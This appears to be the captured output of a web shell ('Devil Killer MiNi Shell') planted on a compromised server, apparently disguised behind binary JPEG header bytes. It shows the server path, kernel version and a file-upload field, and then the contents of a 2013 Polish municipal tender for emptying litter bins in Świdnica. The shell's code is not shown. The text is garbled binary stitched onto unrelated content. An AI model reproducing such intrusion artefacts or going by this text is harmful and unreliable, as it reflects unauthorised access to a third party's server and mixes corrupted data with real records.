JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131031/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131031/444998-N-2013.html

<p class="kh_header"><b>Świdnica: Opróżnianie koszy ulicznych na terenie miasta Świdnica wraz z wynajmem koszy</b><br>
<b>Numer ogłoszenia: 444998 - 2013; data zamieszczenia: 31.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Świdnicy , ul. Armii Krajowej 49, 58-100 Świdnica, woj. dolnośląskie, tel. 074 8562850, faks 074 8523110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swidnica.bip-gov.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opróżnianie koszy ulicznych na terenie miasta Świdnica wraz z wynajmem koszy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Rozdział 3  OPIS  PRZEDMIOTU  ZAMÓWIENIA

3.1 Wspólny Słownik Zamówień CPV:
Kod CPV:   90.51.32.00-8 Usługi wywozu stałych odpadów miejskich
                     90.51.13.00-5 Usługi zbierania śmieci

3.2 Przedmiot zamówienia:
3.2.1 Ustawienie na terenie miasta Świdnica 391 szt.  koszy ulicznych stanowiących własność Wykonawcy o pojemności minimum 35 litrów, maksimum 50 litrów.  Systematyczne ( nie dopuszczające do przepełnienia kosza ) opróżnianie 391 koszy ulicznych i wywóz zebranych odpadów komunalnych. Utrzymanie koszy we właściwym stanie technicznym i estetycznym wyglądzie.

3.2.2  Systematyczne ( nie dopuszczające do przepełnienia kosza ) opróżnianie 112 szt. koszy ulicznych zamontowanych trwale do podłoża o pojemności od 50 do 80 litrów stanowiących własność Zamawiającego i wywóz zebranych odpadów komunalnych. Utrzymywanie koszy we właściwym stanie technicznym ( w tym niezwłoczne wykonywanie drobnych napraw )  i estetycznym wyglądzie. 

3.2.3  Lokalizacja koszy: ciągi piesze ( chodniki, place ) oraz parkingi

3.2.4  Szczegółowy opis przedmiotu zamówienia zawiera część II SIWZ Opis przedmiotu zamówienia rozdział 23.

3.2.5  Wykaz miejsc ustawienia koszy ulicznych na terenie miasta Świdnica zawiera część II SIWZ Opis przedmiotu zamówienia rozdział 24.


Rozdział 4  TERMIN REALIZACJI PRZEDMIOTU ZAMÓWIENIA

Okres realizacji zamówienia:
- od dnia  01.01.2014 r. do dnia 30.06.2015 r. - w przypadku zawarcia umowy do 01.01.2014 r.
- od dnia zawarcia umowy do dnia 30.06.2015 r. - w przypadku zawarcia umowy po 
01.01.2014 r.


ROZDZIAŁ 23   SZCZEGOŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA                        
dotyczącego  
Opróżnianie koszy ulicznych na terenie miasta Świdnica wraz z wynajmem koszy
 
23.1.  Do zadań Wykonawcy należy:

23.1.1 Ustawienie na terenie miasta Świdnica  391  koszy ulicznych stanowiących własność Wykonawcy o pojemności minimum 35 litrów, maksimum  50 litrów.
Systematyczne ( nie dopuszczające do przepełnienia kosza ) opróżnianie 391 koszy ulicznych stanowiących własność Wykonawcy wraz z wywozem zebranych odpadów komunalnych.
Zamawiający wymaga aby w ciągach pieszych danej drogi były ustawione kosze o tym samym modelu i jednakowej pojemności. 
Wykaz miejsc ustawienia koszy  Wykonawcy wraz z podaną ilością koszy zawiera rozdział 24  SIWZ pkt. 1.

23.1.2  Systematyczne ( nie dopuszczające do przepełnienia kosza ) opróżnianie 112 szt. koszy ulicznych  zamontowanych trwale do podłoża  o pojemności od 50 do 80 litrów stanowiących własność Zamawiającego wraz z  wywozem zebranych odpadów komunalnych.
 Wykaz  lokalizacji koszy Zamawiającego wraz z podaną ilością koszy i ich pojemnością zawiera rozdział 24 SIWZ  pkt. 2.

23.1.3  Utrzymywanie estetycznego wyglądu koszy, które obejmuje usuwanie zabrudzeń koszy  oraz mycie całych koszy według potrzeb. Terminy wykonania prac w zakresie mycia koszy winny 
być uzgodnione z Zamawiającym.

23.1.4  Utrzymywanie  we właściwym stanie technicznym koszy Wykonawcy,

23.1.5  Utrzymywanie we właściwym stanie technicznym koszy Zamawiającego, w tym  niezwłoczne wykonywanie drobnych  napraw np.
 - zamontowanie wyrwanego kosza ( z podłożem lub bez podłoża),
 - wyprostowanie przechylonego kosza,
 - naprawa zawiasów ( np. od urwanej pokrywy ),
 - uzupełnienie kołków mocujących,
 - ułożenie kostki betonowej lub granitowej ( w przypadku wyrwania kosza z podłożem ),

23.1.6  Zamawiający wymaga aby Wykonawca  opróżniając kosz  uliczny opróżniał całą jego zawartość.

23.1.7  Usuwanie nieczystości wokół koszy w promieniu 3 m od kosza.
Wykonawca w czasie opróżniania koszy będzie usuwał w promieniu 3 m od kosza nieczystości w postaci niedopałków papierosów, papierów, resztek żywności oraz innych , które nie zostały wrzucone do kosza lub zostały wywiane z kosza.

23.1.8  Wymiana zniszczonych koszy  stanowiących własność Wykonawcy na nowe kosze tego samego typu.
23.1.9 Przestawianie koszy ulicznych będących własnością Wykonawcy i Zamawiającego w przypadku zaistnienia takiej konieczności ( wniosek mieszkańców, prace remontowe lub budowlane itp.)

23.1.10  Informowanie w formie pisemnej Zamawiającego o ewentualnych uszkodzeniach i zniszczeniach koszy lub innych nieprawidłowościach występujących w trakcie realizacji zamówienia.

23.1.11  Opróżnianie koszy  winno odbywać się w przedziale czasowym od godz. 6.00 do godz. 14.00  z  tym, że kosze  zlokalizowane w: 
-  centrum i strefie centralnej miasta do której zalicza się nieruchomości zabudowane budynkami frontowymi, położone przy Rynku i ul. Wewnętrznej oraz  nieruchomości położone po obu stronach ulic : Długa, Kotlarska, Pułaskiego, Grodzka, Łukowa Franciszkańska, Świętokrzyska Daleka,  Środkowa, Trybunalska, Bohaterów Getta, Pl. Grunwaldzki, Wałbrzyska do przejazdu kolejowego - powinny być opróżnione do godz. 8.00.
-  strefie śródmiejskiej  do której zalicza  się nieruchomości w obszarze ograniczonym ulicami :
Westerplatte, do mostu,  Śląska, Lipowa, Pl. Ludowy, Wyspiańskiego , Sprzymierzeńców do zbiegu z ul. Traugutta , Kolejowa, Spacerowa, Ofiar Oświęcimskich, Zamenhofa, Wałowa, Boczna, Jagiellońska, Ks. Bolko Świdnickiego, Saperów, Rzeźnicza,  Mieszka, Równa, Zygmuntowska oraz 
Osiedla Mieszkaniowe: Zawiszów, Zarzecze i Młodych z wyłączeniem ulic zaliczanych do centrum i strefy centralnej, z zaliczeniem posesji z  obu stron ulic granicznych - powinny być opróżnione do godz. 12.00
- strefie peryferyjnej, do której zalicza się nieruchomości położone poza terenem strefy śródmiejskiej  - powinny być opróżnione do godz. 14.00.

23.1.12 W przypadku zgłoszenia przez Zamawiającego lub Straż Miejską faktu przepełnienia kosza w godzinach od 8.00 do 19.00 Wykonawca ma obowiązek opróżnić przepełniony kosz w ciągu 2 godzin od zgłoszenia. 

23.1.13  W przypadku zgłoszenia przez Zamawiającego lub Straż Miejską faktu przewrócenia kosza i zalegania wokół niego nieczystości w godzinach opróżniania ( od godz. 6.00 do godz. 14.00 ) Wykonawca ma obowiązek ustawić kosz i usunąć nieczystości w promieniu 3 m od kosza w ciągu 2 godzin od zgłoszenia.

23.1.14  W przypadku zgłoszenia przez Zamawiającego lub Straż Miejską faktu  przewrócenia kosza i zalegania wokół niego nieczystości poza godzinami opróżniania ( od godz.14.00 do godz. 6.00 dnia następnego ) Wykonawca ma obowiązek ustawić kosz  i usunąć nieczystości w promieniu 3 m od kosza  w ciągu:
- 3 godzin od zgłoszenia w dni robocze ( od poniedziałku do piątku ) 
- 6 godzin od zgłoszenia w soboty, niedziele i święta.

23.1.15  W przypadku zaistnienia okoliczności uniemożliwiających wykonanie usługi zgodnie z zapisami umowy Wykonawca jest zobowiązany zawiadomić o tym fakcie Zamawiającego lub Straż Miejską ( poza godzinami pracy Urzędu Miejskiego ) podając jednocześnie nowy termin wykonania usługi.       

23.1.16  Wykonawca najpóźniej w dniu zawarcia umowy zobowiązany jest zgłosić pisemnie osobę odpowiedzialną za nadzór nad realizacją prac ze strony Wykonawcy.
ROZDZIAŁ 24  WYKAZ MIEJSC USTAWIENIA KOSZY ULICZNYCH NA TERENIE MIASTA ŚWIDNICA
                                                                                                        
1.	Wykaz miejsc ustawienia koszy Wykonawcy                             Ilość koszy                                                                                                                                   
1) ul. Kościelna  -  III Liceum Ogólnokształcące szt. 3
2) ul. Kościelna 5	szt. 1
3)  ul. Kościelna 18	 szt. 1 
4) ul. 1-go Maja 21 szt. 1
5) ul. 1-go Maja - po stronie skarpy, naprzeciwko Carrefour szt. 2
6) ul. 1-go Maja 1	szt. 1
7) ul. 1-go Maja 27 szt. 1
8) ul. 1-go Maja 2                                                                          	szt. 1
9) ul. 1-go Maja - przy ogrodzeniu placu zabaw				szt. 1
10) ul. 1-go Maja - chodnik vis a vis posesji 1 Maja 15 			szt. 1 
11) skrzyżowanie1 Maja /Wrocławska - po stronie skarpy		szt. 1 
12) skrzyżowanie Paderewskiego/Kościuszki - przy ciągu pieszym	szt. 2
13) Pl. Grunwaldzki- przed MDH				szt. 4
14) Pl. Grunwaldzki - koło schronu			  	szt. 1
15) Pl. Grunwaldzki - koło poczty				szt. 1
16) skrzyżowanie Pl. Grunwaldzki/Lelewela - koło apteki		szt. 1
17) ul. Nauczycielska - po stronie Domu Nauczyciela  		szt. 1
18) ul. Nauczycielska - po stronie MDK			szt. 1
19) ul. Nauczycielska - po stronie wieży ciśnień			szt. 1
20) ul. Of. Oświęcimskich- koło przedszkola			szt. 1
21) ul. Of Oświęcimskich 22					szt. 1
22) ul. Of. Oświęcimskich 16					szt. 1
23) ul. Of. Oświęcimskich 4					szt. 1
24) ul. Of. Oświęcimskich 5					szt. 1
25) ul. Of. Oświęcimskich 8					szt. 1
26) ul. Of. Oświęcimskich 49					szt. 1
27) ul. Of. Oświęcimskich - koło marketu ALDI			szt. 2
28) ul. Jagiellońska 1	szt. 1
29 ) ul. Jagiellońska 5-7 					szt. 1
30) ul. Jagiellońska 4-6					szt. 1
31) ul. Jagiellońska 11					szt. 1
32) ul. Jagiellońska 15					szt. 1
33) ul. Jagiellońska 12					szt. 1
34) ul. Jagiellońska  20 					szt. 1
35) ul. Zamkowa - u zbiegu ulic Zamkowa/Basztowa		szt. 1
36) ul. Zamkowa - naprzeciwko pizerii Da Grasso	szt. 1
37) ul. Zamkowa- po stronie Kościoła Zielonoświątkowego		szt. 1 
38) ul. Żeromskiego- trójkąt - przejście dla pieszych		szt. 2
39) ul. Żeromskiego 3			szt.1                                      
40) ul. Żeromskiego  13					szt. 1
41) ul. Żeromskiego 28 					szt. 1 
42) ul. Żeromskiego 40 					szt. 1
43) ul. Żeromskiego - po stronie składu opałowego		szt. 1
44) ul. Żeromskiego - po stronie posesji Muzealna 4		szt. 1 
45) ul. Komunardów 9					szt. 1
46) ul. Komunardów - koło sprzętu medycznego			szt. 1 
47) ul. Rzeźnicza- chodnik po prawej stronie od Wrocławskiej do Mieszka	szt. 1
48) Pl. Drzymały - wzdłuż terenu zielonego				szt. 3
49) ul. Dębowa 2							szt. 1
50) ul. Dębowa 12 							szt. 1
51) ul. Dębowa 26							szt. 1
52) ul. Klonowa - w pobliżu Biedronki					szt. 2
53) ul. Klonowa - po stronie ogródków 				szt. 2 
54 ) ul. Okrężna 2							szt. 2
55) ul. Okrężna 13 a						szt. 1
56) ul. Okrężna 21							szt. 1
57) ul. Okrężna 48 							szt. 1
58) ul. Okrężna - koło piekarni 					szt. 1
59) ul. Okrężna - vis a vis budynku nr 62				szt. 1
60) ul. Okrężna 74							szt. 1
61) ul. Miłego Dnia - po stronie firmy Forpol 				szt. 2 
62) ul. Jodłowa 17							szt. 1
63) ul. Jodłowa 21 - Gimnazjum nr 4					szt. 2
64) ul. Jodłowa 23							szt. 1
65) ul. Jodłowa 38 - wjazd na teren hurtowni 				szt. 1
66) ul Kliczkowska - w pobliżu przychodni Ar- vita			szt. 1
67) ul. Kliczkowska - w pobliżu budynku nr 28				szt. 1
68) ul. Kliczkowska - w pobliżu budynku nr 18				szt. 1
69) ul. Kliczkowska - w pobliżu budynku nr 24 				szt. 1
70) ul. Kliczkowska - w pobliżu budynku nr 15				szt. 1
71) ul. Kliczkowska - w pobliżu budynku nr 23				szt. 1
72) ul. Kliczkowska - Wyższa Szkoła Teleinformatyczna 			szt. 2
73) ul. Równa - na wysokości basenu krytego				szt. 1 
74 ) ul. Równa 11 - II Liceum Ogólnokształcące				szt. 2
75) ul. Równa 14							szt. 1
76) ul. Równa - w pobliżu budynku nr 8				szt. 1
77) ul. Równa - na wysokości Galerii Świdnickiej				szt. 2
78) ul. Zygmuntowska 1						szt. 1
79) ul. Zygmuntowska 2						szt. 1
80) Pl. Św. Małgorzaty - w pobliżu skrzyż. z ul. Chrobrego		szt. 1
81) ul. Konopnickiej - po stronie zaplecza posesji Chrobrego 10		szt. 1
82) ul. Konopnickiej - przy ogrodzeniu przedszkola koło parkometru 		szt. 1
83) ul. Konopnickiej - na wysokości parkingu				szt. 1
84) ul. Konopnickiej - po stronie biblioteki				szt. 1
85) ul. Konopnickiej - przy ogrodzeniu placu zabaw			szt. 1 
86)  ul. Długa 33-35						szt. 1
87)  ul. Długa 45a							szt. 1
88) ul. Długa 60 							szt. 1
89) ul. Długa 72 - koło Urzędu Miar 					szt. 1
90) ul. A. Krajowej- od Oświęcimskiej do Okulickiego			szt. 1
91) ul. A. Krajowej - od Okulickiego do Inwalidów Wojennych		szt. 1
92) ul. A. Krajowej - od Inwalidów Wojennych do Niecałej 		szt. 3
93) ul. A. Krajowej - od Niecałej do Wałbrzyskiej
- prawa strona drogi						szt. 3
94) ul. A. Krajowej - od Niecałej do Wałbrzyskiej 
- lewa strona drogi							szt. 4
95) róg Długiej i Klasztornej	 					szt. 1
96) ul. Trybunalska 1						szt. 1
97) róg Trybunalskiej i Spółdzielczej	 				szt. 1 
98) ul. Środkowa 1							szt. 1
99) ul. Środkowa 4							szt. 1
100) ul. Środkowa 7						szt. 1
101) ul. Środkowa 8						szt. 1
102) ul. Spółdzielcza - po stronie zieleńca 				szt. 1
103) ul. Spółdzielcza - parking					szt. 2
104) ul. Spółdzielcza  9						szt. 1
105) ul. Spółdzielcza 14						szt. 1
106) ul. Spółdzielcza - po stronie Caritas				szt. 1
107) ul. M. Kunic 2 						szt. 2
108) ul. M.Kunic 6							szt. 1
109) ul. M.Kunic 1-9						szt. 2
110) ul. Spacerowa - stanowiska dla autobusów			szt. 10
111) ul. Kolejowa 17						szt. 1
112) ul. Sikorskiego 1						szt. 1
113) ul. Sikorskiego 7  						szt. 1
114) ul. Sikorskiego 15						szt. 1
115) ul. Sikorskiego 29			szt.1                                       
116) ul. Sikorskiego 33						szt. 1 
117) ul. Bracka 3							szt. 1
118) ul. Bracka 6	 						szt. 1
119) ul. Daleka - róg Dalekiej i Pułaskiego	szt.1                                        
120) ul. Daleka - w pobliżu sklepu 1001 Drobiazgów			szt. 1
121) ul. Mennicka - w pobliżu budynku Mennicka 3			szt. 1
122) ul. Siostrzana - koło Towarzystwa Ubezpieczeniowego		szt. 1
123) ul. Siostrzana - koło sklepu Campus szt.1                                             
124) ul. Siostrzana 2						szt. 1
125) ul. Siostrzana 10						szt. 1
126) ul. Teatralna - koło parkometru					szt. 1
127) ul. Teatralna 14						szt. 1
128) ul. Boh. Getta 21						szt. 1
129) ul. Saperów - po stronie kortu tenisowego				szt. 1
130) ul. Saperów - przy drodze do Gimnazjum nr 3			szt. 1
131) ul. Saperów - od ZUS do Wrocławskiej - lewa str.			szt. 2
132) ul. Saperów - od Kościelnej do Wrocławskiej - prawa str.		szt. 2
133) ul. Saperów - w pobliżu budynku nr 3				szt. 1 
134) ul. Saperów - w pobliżu budynku nr 16				szt. 1
135 ul. Saperów 27 - Szkoła Podstawowa nr 11 				szt. 1
136) ul. Pobożnego- ciąg pieszy od Łokietka do  K.Wielkiego		szt. 3
137)  skrzyżowanie Pobożnego/Łukasińskiego - chodnik po stronie garaży	szt. 1
138) K. Wielkiego - chodnik naprzeciwko Stokrotki			szt. 2
139) skrzyżowanie K.Wielkiego/Stęczyńskiego - chodnik
koło kamiennej tablicy ZPORR					szt. 1
140) Kazimierza Wielkiego ciąg pieszo -jezdny
od przystanku MPK do B.Śmiałego					szt. 2
141. Stęczyńskiego - chodnik od ronda do Zmorskiego			szt. 2
142) skrzyżowanie Stęczyńskiego/Łukasińskiego -chodnik
po stronie parkingu							szt. 1 
143) ul. Polna Droga - parking					szt. 4
144) ul. Sprzymierzeńców - chodniki przy parkach			szt. 2
145) ul. Sprzymierzeńców - w pobliżu Seminarium			szt. 1
146) ul. Sprzymierzeńców - w pobliżu budynku
Wyspiańskiego 1							szt. 1 
147 ) ul. Sprzymierzeńców - w pobliżu  Zakładu Poprawczego		szt. 1 
148) ul. Łukasińskiego - przy parkach - chodnik				szt. 2
149) ul. Łukasinskiego - w pobliżu ul. Krętej				szt. 1 
150) ul. Łukasińskiego 1						szt. 1
151) ul. Łukasińskiego 7						szt. 1
152) ul. Łukasińskiego 13			szt.1                                     
153) ul. Łukasińskiego 2						szt. 1
154) ul. Łukasińskiego - koło sklepu EKO				szt. 1
155) ul. Łukasińskiego - koło Z-du Pafal				szt. 1
156) ul. Kanonierska - przy parku ciąg chodnika				szt. 3
157) ul. Traugutta - chodnik przy parku				szt. 3
158) ul. Traugutta - w pobliżu budynku nr 8				szt. 1
159) ul. Traugutta - po stronie Zakładu Wulkanizacyjnego		szt. 1 
160) ul. Gdyńska - chodnik przy parku					szt. 2
161) skrzyżowanie Gdyńska/Parkowa - przy parku			szt. 1             
162) ul. Parkowa - od Saperów do Gdyńskiej - prawa str.			szt. 2
163) ul. Parkowa - od Saperów do Gdyńskiej 
- lewa strona drogi							szt. 1  	
164) ul. Ks. Agnieszki 2 - Zespół Szkół Ekonomicznych 			szt. 2
165) ul. Ks. Agnieszki - w pobliżu parafii Ewangelicko-
 Augsburskiej 							szt. 1 
166) ul. Ks. Agnieszki - po stronie budynków 7-9 			szt. 1
167) ul. Śląska - przy obiektach OSIR					szt. 4
168) ul. Mieszka - chodnik od Wodnej do Równej
- lewa strona drogi							szt. 4
169) ul. Mieszka -  chodnik od Rzeźniczej do Wodnej	
- lewa strona drogi							szt. 3
170) ul. Głowackiego - przy Urzędzie Gminy				szt. 2
171) ul. Głowackiego- przy budynku nr 10, 14, 22                               	szt. 3
172) ul. Okulickiego + parking przed Starostwem	Powiatowym	szt. 4
173) ul. Okulickiego - koło Firmy Eltex					szt. 1
174) ul. Okulickiego - wjazd od Skłodowskiej				szt. 2
175) ul. Okulickiego 10						szt. 1
176) ul. Okulickiego 20						szt. 1
177) ul. Dworcowa							szt. 5
178) ul. Riedla - chodnik po prawej stronie od Zamenhofa
        do Słobódzkiego						szt. 1
179) ul. Wyszyńskiego - ciąg pieszy od Słobódzkiego
         do Waryńskiego - prawa strona drogi			szt. 4
180)  ul. Wyszyńskiego- ciąg pieszy od Słobódzkiego
       do Waryńskiego - lewa strona drogi				szt. 3 
181) ul. Wyszyńskiego - ciąg pieszy od Prądzyńskiego
         do Dąbrowskiego - prawa str. drogi				szt. 1
182) ul. Wyszyńskiego - promenada - przed kościołem		szt. 4        
183)  ul. M. Skłodowskiej - naprzeciwko  Intermarche			szt. 3
184)  Komorowskiego - w pobliżu skrzyżowania
        z ul. Skłodowskiej						szt. 1
185) ul. Lelewela - strona parzysta i nieparzysta			szt. 5
186)  ul. Wrocławska 4						szt. 1
187) ul. Wrocławska 3 - koło salonu meblowego		  		szt. 1
188) ul. Wrocławska - koło budynku ŚPWIK				szt. 1
189) ul. Wrocławska 24						szt. 1
190) ul. Wrocławska 23						szt. 1
191) ul. Wrocławska 31						szt. 1
192) ul. Wrocławska - w pobliżu budynku 41				szt. 1
193) ul. Wrocławska 44						szt. 1
194) ul. Wrocławska 38						szt. 1
195) ul. Wrocławska 52 - w pobliżu Apteki				szt. 1
196) ul. Wrocławska 57						szt. 1
197)  ul. Wrocławska - skarpa-ciąg chodnika do Pl. Wolności		szt. 3
198)  Al. Niepodległości - ciąg od Młyna do Garbarskiej 	 		szt. 2
199) Al. Niepodległości - ciąg chodnika przy Placu
 Wojska Polskiego							szt. 1
200) Al. Niepodległości 4						szt. 1
201) Al. Niepodległości 3						szt. 1
202) Al. Niepodległości 14						szt. 1
203)  Al. Niepodległości 7 						szt. 1
204) Al. Niepodległości - po stronie Aresztu Śledczego			szt. 2 
205) Al. Niepodległości - koło Szkoły Muzycznej				szt. 1
206) Al. Niepodległości - po stronie muru Katedry			szt. 2
207) ul. Westerplatte 4						szt. 1
208) ul. Westerplatte - w pobliżu budynku nr 8				szt. 1
209) ul. Westerplatte 20						szt. 1
210) ul. Westerplatte - naprzeciwko Dolmeb				szt. 1 
211)  ul.Westerplatte 16						szt. 1
212) ul. Westerplatte 13						szt. 1
213) ul.Westerplatte 21						szt. 1
214) ul. Westerplatte 29						szt. 1
215) ul. Westerplatte 37						szt. 1
216) ul. Westerplatte - na wysokości firmy Forpol			szt. 1
217) ul. Westerplatte - w pobliżu parkingu				szt. 2
218) ul. Westerplatte - koło Szpitala					szt. 1
219) ul. Westerplatte 44						szt. 1
220) ul. Westerplatte 47 - w pobliżu mostu				szt. 1
221) ul. Westerplatte -  koło wjazdu  na posesję Westerplatte 24		szt. 1
222) ul. Westerplatte - w pobliżu Galerii Świdnickiej			szt. 3
223) ul. Westerplatte - koło przychodni Rajmed			szt. 1
224) ul. Wałbrzyska -od Głowackiego do budynku nr 14 			szt. 2
225) ul. Wałbrzyska - w pobliżu budynku 31				szt. 1 
226) ul. Wałbrzyska - w pobliżu zieleńca Polna Droga			szt. 2 
227) ul. Wałbrzyska - koło Przedszkola					szt. 1
228) ul.Wałbrzyska 54- koło Szkoły Cech Rzemiosł Różnych		szt. 1
229) ul. Wałbrzyska - koło Stacji Sanitarno- Epidemiologicznej		szt. 1  
230) ul. Wałbrzyska - po stronie parku					szt. 1
231)  ul. Wałbrzyska 7 						szt. 1
232) ul. Wałbrzyska 6						szt. 1
233) ul. Wałbrzyska - Zespół Szkół Budowlano - Elektrycznych		szt. 2
234) ul. Wałbrzyska - Szkoła Podstawowa nr 8 				szt. 2
235) ul. Zamenhofa - od Kunic do Sikorskiego - lewa str. drogi		szt. 4
236) ul. Zamenhofa - chodnik od wyjazdu z parkingu 
Przychodni do budynku nr 5						szt. 2  
237) ul. Zamenhofa 3a 						szt. 1
238) ul. Zamenhofa - przy ławkach po stronie pawilonów			szt. 3
239) ul. Zamenhofa - w pobliżu przychodni				szt. 3
240) ul. Pionierów - od Wałbrzyskiej do Sprzymierzeńców - po stronie parku								szt. 2
241) ul. Pionierów - I Liceum Ogólnokształcące				szt. 2
242) ul. Pionierów - od Sprzymierzeńców do Śląskiej 
- prawa strona drogi						szt. 1
243) ul. Pionierów- od Sprzymierzeńców do Śląskiej
- lewa strona drogi							szt. 1 
244). ul. Kwiatowa - po stronie przedszkola				szt. 1 
245)  ul. Waryńskiego - ciąg pieszy do Marcinkowskiego			szt. 3
246) Pl. Wolności - przed apteką 					szt. 2
247) ul. Garbarska - po stronie muru					szt. 1
248)  ul. Rolnicza - po stronie kościoła					szt. 1
249). ul. Kraszowicka - koło Szkoły Podstawowej			szt. 2
250) ul. Ks. Jadwigi Śląskiej - koło pawilonów handlowych		szt. 2 
251) PL. Wojska Polskiego 3-  Szkoła Podstawowa nr 3 			szt. 3
